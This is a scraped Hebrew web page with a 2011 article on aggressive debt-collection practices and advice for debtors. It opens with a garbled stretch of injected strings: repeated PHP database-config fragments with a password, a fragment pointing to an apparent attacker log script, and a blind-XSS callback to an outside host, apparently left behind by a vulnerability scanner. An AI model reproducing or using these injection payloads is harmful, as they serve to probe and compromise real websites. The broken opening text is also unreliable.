$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> בעלי חוב נכנעים ללחצים אגרסיביים של הגובים ונאלצים לשלם את חובם שלעיתים לא מוצדק
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

לא שלמת את חובך העיקול וההוצאה לפועל בדרך אליך

תאריך: 02/02/2011 10:36   מחבר: מערכת האתר

גביית חוב

לפעמים רובץ עלינו חוב שאנו לא מודעים לו או ששכחנו לשלם אותו בתום לב. כל זה לא מעניין את הנושים לחוב שיכולים להיות, רשות השידור, דוחות חנייה עירוניים, כבישי אגרה, שירותי אמבולנס ומה לא בעצם. תחקיר של העיתון "גלובס" בשיתוף ארגון "אמון הציבור" חושף שורה של התנהלות מעצבנת, מטרידה ומאיימת כלפי החייבים. לפי העולה מהתחקיר, הנושים עושים לעצמם חיים קלים בבואם לגבות את חובם. במקום לפנות ישירות לחייב ולגיע איתו להסדר התשלום, הם מעסיקים חברות גבייה ומשרדי עורכי דין שלא עושים חשבון לאף אחד, שולחים מכתבים בהם איום לא מרומז לביצוע עיקולים בחשבון הבנק ובשאר הנכסים, במידה והחוב לא יפרע תוך מספר ימים כנקוב במכתבי עורכי הדין המועסקים על ידי החברות הנושות.

לקוחות שנבהלים מאיומי הגובים מעדיפים לשלם תחת לחץ והעיקר לא להסתבך. אחרים שמאמינים בצדקתם נלחמים עליה ומצליחים אפילו לבטל את החוב שהושת עליהם לאחר שנמצא כלא צודק ולא נכון.

עוד עולה כי אזרח קיבל התראה על עיקול שלשה חשבונות בנק, שני חשבונות ומשכורת, בגין חוב שלא היה קיים למס הכנסה.

לפי דיווח המרכז לגביית קנסות, בשנת 2010 נגבו 16 מיליארד שקל מציבור החייבים, עלייה של 33% לעומת שנה קודמת.

רגולציה נדרשת

בעקבות ממצאי התחקיר מסרה מנכ"ל הארגון גלית אבישי שהקלות הבלתי נסבלת שבה הדברים מנוהלים, שכל גוף עושה כראות עיניו בבואו לגבות את החוב ואף מערב גורמי גבייה חיצונית שעלות הפעלתם נופלת על החייב. לכן מציעה התערבות מיידית של המחוקק כדי לקבוע הוראות מה מותר ומה אסור לגובים, וזאת הגיע הזמן לבצע לאחר 4 שנים של דיונים ותלונות רבות של צרכנים בעניין הנדון.

לפי הנמסר מלשכת עורכי הדין בעניין זה, מכתב התראה ששולח עורך הפועל כגובה חובות מחייב את מקבלו להשיב תוך 30 יום. אם החוב לא מוצדק על החייב להסביר עמדתו בצירוף מסמכים ואז עורך הדין אמור להחזיר את דרישת החוב לנושה. לשכת עורכי הדין ממליצה לחייבים על באמת, להסדיר החוב כדי להימנע מהפעלת הוצאה לפועל.

עצות לחייבים

משרד עורכי הדין בר און כהן מציע לחייבים לנהוג כך:

סגירת החוב מול הנושה - העדיפו סגירת החוב ישירות מול הנושא לפני העברתו לעורך דין כי אז עלות טרחתו תחול על החייב. אם שולחים לכם מכתב התראה לא להתעלם יתכן והוא מציע פשרה.

פירוט החוב - לא לוותר על הדרישה לקבל פירוט חוב מדוקדק ולא להסתפק בשורה התחתונה.

אישורי מסירה - אם שוגרו התראות ודרישות חוב לכתובת לא נכונה תבקשו את המכתבים שנשלחו ואם לא ימצאו לא תחוייבו בריבית והצמדה.

בדיקת התקשרות - בדקו את חוזה ההתקשרות עם החברה נותנת השירות שגם דורשת את החוב.

התיישנות - לפנות לעורך דין ולבדוק האם חלה התיישנות על דרישת החוב הנקובה.

שלמו חלק מוסכם - אם חלק מהחוב מוסכם עליכם, שלמו אותו גם אם הגיע לטיפול ההוצאה לפועל, כך תימנעו מריביות על חלק זה ותוכלו לנהל את יתר ההליכים בקלות רבה.

תגיות בעמוד:   הוצאה לפועל    גביית חובות    עיקולים    התראות    נושים,